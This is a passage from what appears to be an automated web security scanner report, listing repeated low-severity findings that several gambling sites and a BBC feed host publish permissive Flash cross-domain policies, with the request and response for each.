   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.59. http://en.karamba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://en.karamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: en.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=se22kc55asucxo55we0oviaq; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.60. http://en.scratch2cash.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://en.scratch2cash.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: en.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:25:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=guti0mfwqnkduvaxbopwkqn0; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.61. http://en.scratchcardheaven.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://en.scratchcardheaven.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: en.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=yhvr1e45ixxzeo55xxn05g45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.62. http://es.bigmoneyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://es.bigmoneyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: es.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:12:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mjg2wh45l44rno452uk5a0vo; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.63. http://es.crazyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://es.crazyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: es.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:47:51 GMT
Accept-Ranges: bytes
ETag: "e8d30e347b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:35:36 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="crazyscratch.com" />
   <allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.64. http://es.karamba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://es.karamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: es.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=44m4vqrb0fff1w55su4oiu55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.65. http://es.scratch2cash.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://es.scratch2cash.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: es.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vipslcyytd5wslftzn5koxya; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.66. http://es.scratchcardheaven.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://es.scratchcardheaven.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: es.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=utsmx245ch0lcwrxtaahtpzs; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.67. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=118
Expires: Mon, 16 May 2011 12:47:26 GMT
Date: Mon, 16 May 2011 12:45:28 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.68. http://fi.bigmoneyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fi.bigmoneyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: fi.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vyq25j55hrag32qnlea4syi0; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.69. http://fi.crazyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fi.crazyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: fi.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:47:58 GMT
Accept-Ranges: bytes
ETag: "249f90e747b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:06 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="crazyscratch.com" />
   <allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.70. http://fi.karamba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fi.karamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: fi.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=agfvqq55044jd2553gvfit55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.71. http://fi.scratchcardheaven.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fi.scratchcardheaven.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: fi.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:24:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nzqrd02e5iqvdbrkckueryyw; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.72. http://fr.bigmoneyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fr.bigmoneyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: fr.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gbdbojzsynaattnqf5kbn455; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.73. http://fr.crazyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fr.crazyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: fr.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:48:06 GMT
Accept-Ranges: bytes
ETag: "30434ec47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:25:16 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="crazyscratch.com" />
   <allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.74. http://fr.karamba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fr.karamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: fr.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:11:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uooya155pkppfw45h05ygvuj; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.75. http://fr.scratch2cash.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fr.scratch2cash.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: fr.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nqz0os2wb0lyl555bngpjaun; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.76. http://fr.scratchcardheaven.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fr.scratchcardheaven.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: fr.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:16 GMT
